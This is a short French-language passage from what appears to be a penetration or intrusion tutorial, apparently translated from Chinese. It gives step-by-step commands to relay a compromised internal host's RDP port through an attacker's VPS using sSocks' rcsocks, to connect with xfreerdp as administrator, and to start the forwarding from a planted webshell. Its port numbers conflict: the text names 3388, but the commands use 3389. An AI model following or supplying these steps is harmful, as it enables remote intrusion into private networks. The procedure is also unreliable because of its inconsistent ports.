
Première étape : utilisez sSocks sur le VPS pour établir la correspondance entre les ports 3388 et 3389, afin de réaliser l'interconnexion du trafic :
root @ kali:〜#/ root / ssocks-0.0.14 / src / rcsocks -l 3389 -p 3389 -vv
Deuxième étape : depuis la machine d'attaque, connectez-vous au port 3388 du VPS. Il est recommandé d'utiliser freerdp plutôt que rdesktop, car freerdp prend en charge l'attente des connexions distantes et locales, le copier-coller de texte et le montage du système de fichiers distant :
root@kali:~#xfreerdp /u:administrator /p:admin /v:【你的ip】:3389
Troisième étape : exécutez immédiatement le transfert de port sur la grosse webshell (gros cheval de Troie) ; vous devrez peut-être cliquer plusieurs fois de suite sur start :
Remarque : l'ensemble du processus est sensible à l'ordre des étapes. Une fois la redirection de ports rcsocks configurée sur le VPS, vous pouvez la laisser sans plus vous en occuper. Exécutez d'abord xfreerdp sur la machine d'attaque afin de maintenir la session active, puis effectuez la redirection du port 3389 du réseau interne depuis la webshell.